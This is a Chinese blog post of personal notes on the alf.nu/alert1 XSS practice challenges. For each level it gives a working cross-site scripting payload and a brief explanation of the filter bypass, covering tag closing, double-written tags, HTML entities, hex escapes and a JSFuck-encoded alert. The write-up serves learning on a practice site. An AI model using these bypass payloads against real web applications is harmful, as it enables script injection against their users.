xss过关练习

正文:

在线练习网站:https://alf.nu/alert1
教程:

https://blog.csdn.net/he_and/article/details/79672900
http://www.bubuko.com/infodetail-1591286.html
https://blog.csdn.net/taozijun/article/details/8100435

仅完成了一部分,后面的以后再看看
一.
1.warmup
“);alert(1)//
“);闭合前面的,//闭合注释后面的,还有<!–可以注释
2.adobe
\”);alert(1)//
在双引号前面加\转义,我们可以先加\转义
3.json
</script><script>alert(1)//
</script>先闭合,<script>闭合后面的,//注释掉”);
4.javascript
%22);alert(1)//
javascript:console.log(“%22);alert(1)//”)
当我们用”,会被\,url编码%22
5.markdown
[[a|http://onerror=’alert(1)’]]
<img alt=”<a href=”http://onerror=’alert(1)'” src=”a.gif”>”>http://onerror=’alert(1)’]]</a>
[[a|b]]    当src无法加载时,执行alt
<img alt=”b” src=”a.gif”>
引用:在onerror()前面有斜杠/并不影响onerror的执行,且在不相邻属性名的情况下,在属性之间加单引号和双引号也不印象属性的执行
6.dom
var m = s.split(/#/);  以#为分割线,输入两个空
Element
TextNode
comment创建注释
Comment#><script>alert(1)</script>
<!–><script>alert(1)</script>–>  后面的–>无影响
7.callback
‘#’;alert(1)//
#号为分割,”是括起来,算一个字符串,;为前一个输入框的结束,//注释后面的
8.skandia
</script><img src=1 onerror=&#97&#108&#101&#114&#116(1)
html标签对大小写不敏感,JS是大小写敏感的,这里alert用的是html字符实体
9.template
\x3c/a\x3e \x3cimg src=1 onerror=alert(1) \x3e \\
<>过滤了,\没有过滤,html渲染回来,\x3c,\x3e
{ ‘<‘: ‘&lt;’, ‘>’: ‘&gt;’, ‘&’: ‘&amp;’, ‘”‘: ‘&quot;’, “‘”: ‘&#39;’ }
10.json2
</s</scriptcript><script>alert(1)//
嵌套双写
11.callbak
‘#’;alert(1);<!–
//被过滤,用<!–代替
12.skandia2
“);[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()//
alert用http://www.jsfuck.com/  编码
 
2018.7.26

标签:

发表评论

电子邮件地址不会被公开。 必填项已用*标注